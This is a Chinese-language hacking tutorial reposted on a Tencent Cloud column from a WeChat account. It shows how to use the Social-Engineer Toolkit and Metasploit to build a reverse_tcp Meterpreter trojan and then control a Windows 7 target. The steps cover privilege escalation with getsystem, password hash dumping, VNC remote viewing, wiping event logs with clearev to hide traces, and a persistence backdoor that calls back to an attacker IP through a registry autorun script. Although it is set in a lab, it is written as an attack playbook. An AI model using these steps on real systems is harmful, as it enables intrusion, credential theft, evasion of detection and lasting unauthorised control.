Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >如何使用SET指令远程木马

如何使用SET指令远程木马

作者头像
知识与交流
发布于 2023-09-05 11:07:36
发布于 2023-09-05 11:07:36
4190
举报
文章被收录于专栏:黑客技术家园黑客技术家园
一 ,远程木马

SET 同时集成了木马生成工具,可以生成木马并调用MSF框架对远程主机进行控制。

生成木马并上传到靶机

1. set

2. 选择1,社会工程学攻击

3. 选择4,创建攻击载荷和监听器

4. 选择2,攻击模式选择reverse_tcp meterpreter

5. 输入ip地址(监听的主机ip,kali的ip地址)和端口(随机,只要不被占用即可)

默认生成木马地址;root/.set

将木马上传到靶机

执行木马操控主机

双击执行木马查看结果

激活 Meterpreter 会话获得 Shell 后即可操控 Win 7 靶机如下图所示

sessions -i 1

操纵主机

可输入help命令查看 Meterpreter 支持的所有攻击命令和描述

截图效果

执行getsystem进行提权攻击

获取密码(windows的密码其实就是藏在一个目录下的hash值)

执行命令hashdump尝试获取系统所有账户的密码的hash值发现失败没关系可以执行Meterpreter 提供的脚本

远程监控win7

run vnc

进一步的攻击还可以执行background将当前会话转移到后台执行达到后台进程切换的目的。

日志清除

为了不暴露攻击者的痕迹行为需要清除系统事件

先打开 Windows 事件查看器查看清理之前的日志记录

win + r输入eventvwr

在 Meterpreter 执行命令 clearev 命令,对靶机的日志进行清除

注意如果不小心ctrl+Z退出了控制台可以通过如下命令恢复

jobs fg %jobnumber是命令编号不是进程号

如果不小心退出了msf的会话重新打开setoolkit设置相同的ip和端口即可恢复

2.4.4 创建后门

当成功获取目标系统的访问权限后需要寻找方法来恢复与目标主机的连接而无需再进入目标系统。

创建持久后门之前先查看下它的帮助文件如下所示

run persistence -h

2. 执行命令创建一个持久后门输出的信息将显示创建后门的一个过程。Kali 将在目标系统中创建了一个持久脚本

(保存在C:\Users\thinkpad\AppData\Local\Temp\naBffRVEO.vbs)并篡改注册表如下所示

run persistence -X -i 5 -p 9000 -r 192.168.145.98(kali渗透机的ip)

3. 查看 Win 7 靶机的注册表和系统文件

4. 为了验证后门是否可利用关闭当前攻击会话重启 Win 7 虚拟机

此时在 Kali 虚拟机重新开启一个终端运行 MSF 框架;监听 Win 7 虚拟机是否重启后能自动上线获得攻击会话

至此后门植入成功以后只要Win 7系统开机便会自动运行后门脚本攻击者可以随时入侵,除非受害主机的管理员发现后删除了注册表相应的键值和系统中植入的后门脚本。

此时即使 Win 7 靶机中的远控木马文件 payload.exe 被管理员删除也没关系;只不过功能受限。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-09-03,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 黑客技术家园 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档